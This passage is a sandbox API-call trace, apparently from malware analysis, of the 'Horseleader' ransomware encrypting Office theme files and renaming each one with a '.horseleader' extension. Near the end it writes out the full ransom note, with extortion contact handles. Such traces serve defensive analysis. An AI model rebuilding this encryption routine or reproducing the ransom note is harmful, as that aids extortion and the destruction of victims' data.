Size=0x840) returned 0x7e2960 [0247.217] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*") returned 66 [0247.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.218] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\.") returned 66 [0247.218] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.218] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.218] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\..") returned 67 [0247.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.218] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.218] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f26d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f26d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1015d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="IRIS.ELM", cAlternateFileName="")) returned 1 [0247.218] lstrcmpiW (lpString1="IRIS.ELM", lpString2="Windows") returned -1 [0247.218] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0247.218] StrStrIW (lpFirst="IRIS.ELM", lpSrch=".horseleader") returned 0x0 [0247.219] lstrcmpW (lpString1="IRIS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.219] lstrcmpW (lpString1="IRIS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.219] lstrlenW (lpString=".testttjffg") returned 11 [0247.219] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.219] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.219] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.220] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM") returned 73 [0247.220] StrStrW (lpFirst="IRIS.ELM", lpSrch=".txt") returned 0x0 [0247.220] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=65885) returned 1 [0247.221] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.221] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.223] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.223] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.224] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.224] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.225] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.225] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.225] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb15d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.225] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.226] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.226] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.226] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.227] CloseHandle (hObject=0x1a4) returned 1 [0247.227] GetProcessHeap () returned 0x780000 [0247.227] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.227] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM.horseleader") returned 85 [0247.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm.horseleader")) returned 1 [0247.228] GetProcessHeap () returned 0x780000 [0247.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.228] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="IRIS.INF", cAlternateFileName="")) returned 1 [0247.228] lstrcmpiW (lpString1="IRIS.INF", lpString2="Windows") returned -1 [0247.228] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0247.228] StrStrIW (lpFirst="IRIS.INF", lpSrch=".horseleader") returned 0x0 [0247.229] lstrcmpW (lpString1="IRIS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.229] lstrcmpW (lpString1="IRIS.INF", lpString2="_uninstalling_.png") returned 1 [0247.229] lstrlenW (lpString=".testttjffg") returned 11 [0247.229] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF", lpSrch=".testttjffg") returned 0x0 [0247.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.229] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF") returned 73 [0247.230] StrStrW (lpFirst="IRIS.INF", lpSrch=".txt") returned 0x0 [0247.230] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=462) returned 1 [0247.230] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1ce, lpOverlapped=0x0) returned 1 [0247.231] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.231] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1ce, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1ce, lpOverlapped=0x0) returned 1 [0247.232] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.232] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.232] CloseHandle (hObject=0x1a4) returned 1 [0247.232] GetProcessHeap () returned 0x780000 [0247.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.233] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF.horseleader") returned 85 [0247.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf.horseleader")) returned 1 [0247.236] GetProcessHeap () returned 0x780000 [0247.236] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.237] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9ac, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.237] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.237] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0247.237] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.237] lstrlenW (lpString=".testttjffg") returned 11 [0247.237] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.237] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.237] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.239] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 76 [0247.239] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.239] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2476) returned 1 [0247.239] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x9ac, lpOverlapped=0x0) returned 1 [0247.241] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff654, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.241] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x9ac, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x9ac, lpOverlapped=0x0) returned 1 [0247.241] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.241] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.242] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.242] CloseHandle (hObject=0x1a4) returned 1 [0247.242] GetProcessHeap () returned 0x780000 [0247.242] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.242] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.horseleader") returned 88 [0247.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.horseleader")) returned 1 [0247.243] GetProcessHeap () returned 0x780000 [0247.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.243] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c1d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.243] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.244] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0247.244] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.244] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.244] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.244] lstrlenW (lpString=".testttjffg") returned 11 [0247.244] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.244] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.244] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG") returned 77 [0247.245] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.245] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19485) returned 1 [0247.245] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c1d, lpOverlapped=0x0) returned 1 [0247.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb3e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c1d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c1d, lpOverlapped=0x0) returned 1 [0247.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.248] CloseHandle (hObject=0x1a4) returned 1 [0247.249] GetProcessHeap () returned 0x780000 [0247.249] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.249] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.horseleader") returned 89 [0247.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png.horseleader")) returned 1 [0247.250] GetProcessHeap () returned 0x780000 [0247.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.250] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c1d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.250] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.250] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\#Decrypt#.txt") returned 78 [0247.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.251] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.251] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.253] lstrlenA 